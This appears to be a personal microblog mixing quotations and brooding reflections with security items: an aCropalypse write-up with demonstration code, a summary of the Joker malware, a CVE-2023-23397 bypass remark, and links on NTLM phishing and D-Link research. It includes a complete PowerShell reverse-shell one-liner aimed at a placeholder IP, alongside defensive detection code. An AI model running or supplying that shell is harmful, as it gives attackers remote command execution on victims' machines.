so.cl

Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others' company. Arthur Schopenhauer


I like ‘people’ that feel the need to specify ‘my views are my own’. They are funny. Ok, not funny. Just plain stupid.

With the wind in my hair,
And the rain on my face,
I’ll harden my heart,
And quicken my pace.

→ in reply to @wdormann

Microsoft only fixed CVE-2023-23397 for remote sound URIs where the host has a ‘.’ in them. An SMB host accessible by hostname only can still be used to trigger this bug. Attackers on your LAN can still use CVE-2023-23397.


Our folly is that we confuse knowledge with information. The efficiencies of software compel us to flatten the human dimension into a friction-less relay for information surfaces. Thought is the enemy in this system. It is slow, inefficient, irregular—it can’t be automated. Chatbots exist to eliminate slow thought, as thought stands in the way of capital at the speed of light. Weightless, mass-less, information capital, mined out of thin air. Those of us left standing after it has mutilated the economy will be reduced to midwives birthing a thoughtless world.

→ in reply to @so.cl

I simply do not care anymore. Call it indifference, call it lethargy, call it demoralization, I don’t care. I simply do not care and there is nothing anyone can say or do to make me care.

This article assumes you’ve already heard about the aCropalypse vulnerability, aka CVE-2023-21036. The bug lies in closed-source Google-proprietary code so it’s a bit hard to inspect, but after some patch-diffing I concluded that the root cause was due to this horrible bit of API ‘design’: https://issuetracker.google.com/issues/180526528.

Google was passing ‘w’ to a call to parseMode(), when they should’ve been passing ‘wt’ (the t stands for truncation). This is an easy mistake, since similar APIs (like POSIX fopen) will truncate by default when you simply pass ‘w’. Not only that, but previous Android releases had parseMode("w") truncate by default too! This change wasn’t even documented until some time after the aforementioned bug report was made.

The end result is that the image file is opened without the O_TRUNC flag, so that when the cropped image is written, the original image is not truncated. If the new image file is smaller, the end of the original is left behind.

IMHO, the takeaway here is that API footguns should be treated as security vulnerabilities. Exploiting aCropalypse: Recovering Truncated PNGs
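The footgun described above, reproduced outside Android as an added example (this is not the article's code): the same write is performed once without O_TRUNC and once with it, and a small chunk walker reports how many bytes survive past the PNG IEND chunk, which is the check a defender can run over exported screenshots. The PNG-shaped sample is constructed inline and is not a valid image.

```python
import os
import struct
import tempfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def build_png(payload: bytes) -> bytes:
    """Constructed sample: signature + one IDAT chunk carrying payload + IEND."""
    def chunk(kind: bytes, data: bytes) -> bytes:
        body = kind + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body))
    return PNG_SIG + chunk(b"IDAT", payload) + chunk(b"IEND", b"")


def overwrite(path: str, data: bytes, truncate: bool) -> None:
    """Mirror of parseMode('w') vs parseMode('wt'): write from offset 0 with or without O_TRUNC."""
    flags = os.O_WRONLY | os.O_CREAT | (os.O_TRUNC if truncate else 0)
    fd = os.open(path, flags, 0o600)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)


def trailing_bytes_after_iend(data: bytes) -> bytes:
    """Walk the chunk list and return whatever follows IEND (empty for a clean file)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, kind = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + data + 4 CRC
        if kind == b"IEND":
            return data[end:]
        pos = end
    raise ValueError("no IEND chunk found")


def demo(truncate: bool) -> int:
    """Write a large original, overwrite it with a smaller 'cropped' file, count leftover bytes."""
    original = build_png(b"A" * 4000)   # 4032 bytes on disk
    cropped = build_png(b"B" * 100)     # 132 bytes on disk
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "shot.png")
        with open(path, "wb") as f:
            f.write(original)
        overwrite(path, cropped, truncate)
        with open(path, "rb") as f:
            return len(trailing_bytes_after_iend(f.read()))
```

Without O_TRUNC the 3900 bytes of the original that extend past the new IEND stay on disk; with it the file ends at IEND.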

Joker is a category of toll-fraud malware initially identified in 2017 whose main goal is to intercept OTPs and subscribe users to premium services by performing clicks.

This family uses various techniques to perform malicious activities; however, the base code remains the same. The malicious code responsible for performing subscription activities is downloaded externally by connecting to malicious links. These payloads can be downloaded all at once or in multiple stages depending on the cloaking techniques used, which may be implemented on the client side or the server side. These techniques help the malware developer avoid detection by antivirus during execution of the payload.

The subscription process is invisible to the user, as it is carried out automatically by the malware. An OTP may or may not be required depending on the SIM operator and the country the malware targets. Reverse engineering of Joker Malware

I don’t want to be caught up in society and the world, I want to be closer to God and his unspoiled creation, because the latter provides what the former only promises.

Every record has been destroyed or falsified, every book rewritten, every picture has been repainted, every statue and street building has been renamed, every date has been altered. And the process is continuing day by day and minute by minute. History has stopped. Nothing exists except an endless present in which the Party is always right. George Orwell, 1984

If you’re just an average person, there may be a lot of things worth doing in your life, but if you look at it from the outside perspective, it might look dull and mundane. The value of your life doesn’t depend on if it entertains a hypothetical observer, it should entertain yourself living it. Besides, a lot of people who do end up epic characters of some sort with ‘a lot to show for themselves’, like Hemingway or Einstein, end up buying into their own LARP and ultimately become a miserable person trapped in a character. It’s like sacrificing your well-being to your ego. And ultimately all of it turns to dust and even the greatest figures in history are barely remembered.

Better to live for living than for the story of your life. That said, it’s never too late to start making interesting choices and crafting a wild adventure for yourself. That, in itself, can be a very worthwhile way to live. I just think you shouldn’t get too hung up on it in terms of a narrative or legacy.

The apple does fall far from the tree if you’re an ant.

PowerShell one-liner to open a TCP socket to a remote server, execute the input as a command, and send the output back.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('xxx.xxx.xxx.xxx',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

And properly indented:

$client = New-Object System.Net.Sockets.TCPClient('xxx.xxx.xxx.xxx', 6666);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
	$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
	$sendback = (iex $data 2>&1 | Out-String );
	$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
	$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
	$stream.Write($sendbyte, 0, $sendbyte.Length);
	$stream.Flush()
};
$client.Close()
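From the defender's side, the one-liner above is easy to spot in PowerShell script block logging (Event ID 4104) because it needs several distinctive pieces in one block. This added example, not part of the original post, scores constructed sample log lines (not real telemetry) against those pieces and flags a line only when enough of them co-occur, so a lone TCPClient call in admin tooling does not fire.

```python
import re

# Constructed sample ScriptBlockText values: benign listing, the reverse-shell shape, a plain port check.
SAMPLE_LOGS = [
    "ScriptBlockText: Get-ChildItem C:\\Users | Select-Object Name",
    "ScriptBlockText: $client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',6666);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String);"
    "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '",
    "ScriptBlockText: $c = New-Object System.Net.Sockets.TCPClient('db.internal',1433); $c.Connected",
]

# Each indicator on its own is legitimate; the combination is what characterises the pattern.
INDICATORS = {
    "tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "stream_io": re.compile(r"\.GetStream\(\)", re.I),
    "dynamic_eval": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "fake_prompt": re.compile(r"'PS '", re.I),
}


def indicators_hit(line: str) -> list:
    """Return the names of the indicators present in one log line."""
    return [name for name, rx in INDICATORS.items() if rx.search(line)]


def is_suspicious(line: str, threshold: int = 3) -> bool:
    """Flag a line when at least `threshold` indicators co-occur (threshold is an assumed tuning value)."""
    return len(indicators_hit(line)) >= threshold


def flagged_lines(lines) -> list:
    """Run the check over a batch of log lines and return the indices that were flagged."""
    return [i for i, line in enumerate(lines) if is_suspicious(line)]
```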

In this post we will discuss ‘How the attacker uses Microsoft Office for a phishing attack to get the NTLM hashes from Windows.’ Since we all know that Microsoft Office applications like Word, PowerPoint, Excel and Outlook are the most relied-upon resources for any organization, an attacker takes advantage of this reliance to masquerade to the user.

Here, we have been trying to explain what different approach an attacker uses in a phishing attack to capture Microsoft Windows NTLM hashes.

In actual fact, the attacker tried to use the UNC path injection technique to capture the Windows NTLM hashes and use phishing to achieve his goal. Abusing Microsoft Outlook 365 to Capture NTLM

In late October 2022, we became aware of CVE-2022-41140, a buffer overflow and remote code execution vulnerability in D-Link routers, which D-Link had been notified of on February 17th. Noting the months-long turnaround time, we decided this was a good chance to perform a learning and discovery exercise.

On March 13th, 2023 we became aware of CVE-2023-24762, a command injection vulnerability in D-Link DIR-867 devices. This recent CVE spurred us to share some of our internal documentation regarding a research spike into D-Link devices.

This blog aims to explain the process of gaining a foothold in firmware or a physical device for vulnerability research and achieving a debuggable interface. While existing Proof-Of-Concept code for (yet another) D-Link vulnerability CVE-2022-1262 is utilized within this document, as well as strong hints at suspect areas of code, don’t expect to find any new ready-to-fire exploits buried in the contents below. Debugging D-Link: Emulating firmware and hacking hardware

I have a beating heart, a healthy body and a mind capable of dreaming. This is all I need. No greater comfort will ever exist.